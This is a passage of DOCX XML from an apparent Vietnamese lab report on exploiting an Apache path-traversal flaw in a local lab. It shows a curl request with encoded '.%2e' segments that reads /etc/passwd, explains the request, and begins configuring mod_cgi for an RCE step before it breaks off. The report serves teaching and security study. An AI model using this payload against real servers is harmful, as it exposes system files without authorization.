      <w:bookmarkStart w:id="88" w:name="_Toc171085245"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Kết quả cấu hình Path traversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="084C2C76" w14:textId="77777777" w:rsidR="00785F06" w:rsidRDefault="00A34A00" w:rsidP="00785F06">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00785F06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Trên Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00BB7F89">
        <w:t>thực hiện reset lại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFB1E9D" w14:textId="5D8667E2" w:rsidR="00FC59FF" w:rsidRDefault="00BB7F89" w:rsidP="00785F06">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004452E3" w:rsidRPr="004452E3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/usr/local/apache2/bin/apachectl restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ECA129" w14:textId="77777777" w:rsidR="0036247A" w:rsidRDefault="0036247A" w:rsidP="00785F06">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF4FDC8" w14:textId="77777777" w:rsidR="0036247A" w:rsidRDefault="0036247A" w:rsidP="00785F06">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0562680B" w14:textId="1BD83E55" w:rsidR="004452E3" w:rsidRDefault="003A1FC4" w:rsidP="0036247A">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="0036247A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00514F17">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00514F17" w:rsidRPr="00514F17">
        <w:t>rên Kali đọc file /etc/passw</w:t>
      </w:r>
      <w:r w:rsidR="00DC5BBC">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00514F17" w:rsidRPr="00514F17">
        <w:t xml:space="preserve"> của Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11280025" w14:textId="77777777" w:rsidR="00D8608C" w:rsidRDefault="00EA5A78" w:rsidP="00C962E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C561D9" w14:textId="38D18E48" w:rsidR="00EA5A78" w:rsidRPr="00D8608C" w:rsidRDefault="00EA5A78" w:rsidP="00D8608C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8608C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="00D8608C">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>http://10.0.2.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="555652FE" w14:textId="0FB8AC1D" w:rsidR="003A223D" w:rsidRDefault="003A223D" w:rsidP="00C04F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phân tích: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B910CD" w14:textId="427A82E5" w:rsidR="001B64F9" w:rsidRDefault="001B64F9" w:rsidP="00C04F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04F30">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”: </w:t>
      </w:r>
      <w:r w:rsidR="0045719F">
        <w:t>là công cụ dòng lệnh được sử dụng để gửi yêu cầu HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7746E0BA" w14:textId="6AF1438B" w:rsidR="00DF50EA" w:rsidRDefault="00DF50EA" w:rsidP="00C04F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00C04F30">
          <w:rPr>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">”: đây là giao thức </w:t>
      </w:r>
      <w:r w:rsidR="003F1219">
        <w:t xml:space="preserve">của URL cho biết phương thức giao tiếp </w:t>
      </w:r>
      <w:r w:rsidR="009B5804">
        <w:t>giữa client và web server</w:t>
      </w:r>
      <w:r w:rsidR="00271936">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68674B03" w14:textId="43E321B8" w:rsidR="00271936" w:rsidRDefault="00271936" w:rsidP="00C04F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04F30">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t>”: là địa chỉ IP của máy chủ web mà yêu cầu được gửi tới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16509C13" w14:textId="48170549" w:rsidR="00271936" w:rsidRDefault="000D6A6A" w:rsidP="00C04F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00C04F30">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04F30">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/cgi-bin/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04F30">
        <w:t xml:space="preserve">”: </w:t>
      </w:r>
      <w:r>
        <w:t>đường dẫn tới thư mục chứa các script CGI trên máy chủ web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD551B9" w14:textId="70488035" w:rsidR="000D6A6A" w:rsidRDefault="00020645" w:rsidP="00C04F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1843"/>
      </w:pPr>
      <w:r w:rsidRPr="00C04F30">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04F30">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.%2e/.%2e/.%2e/.%2e/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04F30">
        <w:t xml:space="preserve">”: </w:t>
      </w:r>
      <w:r>
        <w:t>được sử dụng để thử tấn công lỗ hổng Path Traversal. Chuỗi này cố gắng truy cập vào các thư mục mẹ nhiều lần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C6953" w14:textId="3ED7B3AF" w:rsidR="00020645" w:rsidRDefault="009758D2" w:rsidP="00C04F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1843"/>
      </w:pPr>
      <w:r w:rsidRPr="00C04F30">
        <w:t>“/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04F30">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”: đường dẫn tới tệp tin </w:t>
      </w:r>
      <w:r w:rsidRPr="005561FF">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trên web server. Tệp này thường chứa thông tin về các tài khoản người dùng trên hệ thống, bao gồm tên người dùng, UID, GID, đường dẫn thư mục gốc và một số thông tin khác</w:t>
      </w:r>
      <w:r w:rsidR="001E22BC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3309FF9C" w14:textId="533D0CF5" w:rsidR="00037802" w:rsidRDefault="001E22BC" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1843"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yêu cầu này có thể là một nỗ lực tấn công để đọc tệp tin </w:t>
      </w:r>
      <w:r w:rsidRPr="005561FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> từ xa thông qua lỗ hổng Path Traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91E998" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D725D0D" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E77176" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B037F7F" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26792403" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6580645A" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7660A12F" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C83170" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4C5FB6" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6026E14F" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338BC2E0" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E5D3D9" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD7B1BF" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54456CCF" w14:textId="77777777" w:rsidR="00037802" w:rsidRDefault="00037802" w:rsidP="00037802">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1843"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03738C25" w14:textId="00659D75" w:rsidR="00EA5A78" w:rsidRPr="00EA5A78" w:rsidRDefault="00EA5A78" w:rsidP="00F552B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE7C154" w14:textId="6432FE57" w:rsidR="003251C2" w:rsidRDefault="00D952CD" w:rsidP="00C04F30">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007A3217">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13544CBD" wp14:editId="3FA7A99B">
            <wp:extent cx="5551690" cy="4884420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2041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392" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5626116" cy="4949901"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FD898D" w14:textId="53DAFAA0" w:rsidR="00C04F30" w:rsidRDefault="00F552B5" w:rsidP="00F552B5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc171085246"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Hình ảnh kết </w:t>
      </w:r>
      <w:r w:rsidR="005440BF">
        <w:t>qủa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của</w:t>
      </w:r>
      <w:r w:rsidR="005440BF">
        <w:t xml:space="preserve"> /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00496A78">
        <w:t xml:space="preserve">tấn công </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Path traversal </w:t>
      </w:r>
      <w:r w:rsidR="004C386E">
        <w:t>bằng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="1827BEE9" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="1E320097" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="56EDB86D" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="54D89238" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="095DFE8B" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="30C56641" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="6995D806" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="2BB30692" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="134ED273" w14:textId="77777777" w:rsidR="00FC267E" w:rsidRPr="00FC267E" w:rsidRDefault="00FC267E" w:rsidP="00FC267E"/>
    <w:p w14:paraId="45696D68" w14:textId="77777777" w:rsidR="00C438FE" w:rsidRDefault="00C438FE" w:rsidP="00F552B5">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00F552B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> K</w:t>
      </w:r>
      <w:r w:rsidR="00D10F44">
        <w:t>iểm tra kết quả</w:t>
      </w:r>
      <w:r w:rsidR="00B33428">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79384F45" w14:textId="70F2CF83" w:rsidR="00D952CD" w:rsidRPr="00B90E8D" w:rsidRDefault="00C438FE" w:rsidP="00FC267E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Đọc nội dung /etc/passwd trên Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00B90E8D" w:rsidRPr="00B90E8D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A75B92" w:rsidRPr="00B90E8D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4BEF6" w14:textId="781F9D56" w:rsidR="00B90E8D" w:rsidRPr="00B90E8D" w:rsidRDefault="00B90E8D" w:rsidP="00FC267E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC2DE3" w14:textId="5BF25567" w:rsidR="00A75B92" w:rsidRDefault="005E3BB2" w:rsidP="00D768D8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E80A54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AC33365" wp14:editId="3BA4E151">
            <wp:extent cx="5829300" cy="4664687"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="74105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4574" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5842348" cy="4675128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B51BAB4" w14:textId="27AEE6FA" w:rsidR="00D768D8" w:rsidRDefault="00F940EE" w:rsidP="00F940EE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc171085247"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Hình ảnh kết quả của /etc/passwd trên </w:t>
      </w:r>
      <w:r w:rsidR="006B0E3E">
        <w:t>Web Serve</w:t>
      </w:r>
      <w:r w:rsidR="00E57567">
        <w:t>r</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="3AE66813" w14:textId="0D191FE0" w:rsidR="005E3BB2" w:rsidRPr="00822DB0" w:rsidRDefault="009F4D8A" w:rsidP="00B551D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0D8"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E7B9D" w:rsidRPr="00822DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kết luận: </w:t>
      </w:r>
      <w:r w:rsidR="005E6DB9" w:rsidRPr="00822DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>thực hiện khai thác Path traversal thành công</w:t>
      </w:r>
      <w:r w:rsidR="008733E5" w:rsidRPr="00822DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6975BC31" w14:textId="42ABFCB9" w:rsidR="008733E5" w:rsidRDefault="001B338D" w:rsidP="000F27E2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r w:rsidRPr="001B338D">
        <w:t>Khai thác lỗ hổng RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71610FB3" w14:textId="77777777" w:rsidR="001A2A46" w:rsidRDefault="008A1988" w:rsidP="000F27E2">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="000F27E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A2A46">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="008A11FB">
        <w:t xml:space="preserve">nable </w:t>
      </w:r>
      <w:r w:rsidR="00323FCA" w:rsidRPr="00323FCA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008A11FB" w:rsidRPr="00323FCA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r w:rsidR="00323FCA" w:rsidRPr="00323FCA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>_cgi”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44766B4E" w14:textId="77777777" w:rsidR="000F27E2" w:rsidRDefault="001A2A46" w:rsidP="000F27E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trên Ubuntu truy cập vào file config: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573785E" w14:textId="189FC5DD" w:rsidR="001B338D" w:rsidRPr="001A2A46" w:rsidRDefault="00915ED7" w:rsidP="000F27E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2A46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nano /usr/local/apache2/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34036C5B" w14:textId="785CAF4B" w:rsidR="001A2A46" w:rsidRDefault="001A2A46" w:rsidP="00371090">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Thêm vào file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01698592" w14:textId="5FFD37D2" w:rsidR="00FE7AFA" w:rsidRDefault="001446DE" w:rsidP="00A47A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792" w:firstLine="648"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004016DD" w:rsidRPr="004016DD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;IfModule mpm_prefork_module&gt;</w:t>
      </w:r>
    </w:p>
